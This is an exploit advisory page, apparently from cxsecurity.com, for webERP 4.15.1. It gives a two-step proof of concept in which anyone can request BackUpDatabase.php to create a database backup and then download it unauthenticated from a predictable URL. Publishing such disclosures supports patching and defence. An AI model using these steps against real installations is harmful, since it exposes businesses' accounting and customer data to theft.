webERP 4.15.1 Backup Disclosure

2020.05.06
Credit: Besim Altinok
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access # Date: 2020-05-01 # Author: Besim ALTINOK # Vendor Homepage: http://www.weberp.org # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15.1 # Tested on: Xampp # Credit: ─░smail BOZKURT -------------------------------------------------------------------------- About Software: webERP is a complete web-based accounting and business management system that requires only a web-browser and pdf reader to use. It has a wide range of features suitable for many businesses particularly distributed businesses in wholesale, distribution, and manufacturing. ------------------------------------------------------- PoC Unauthenticated Backup File Access --------------------------------------------- 1- This file generates new Backup File: http://localhost/webERP/BackUpDatabase.php 2- Someone can download the backup file from: -- http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top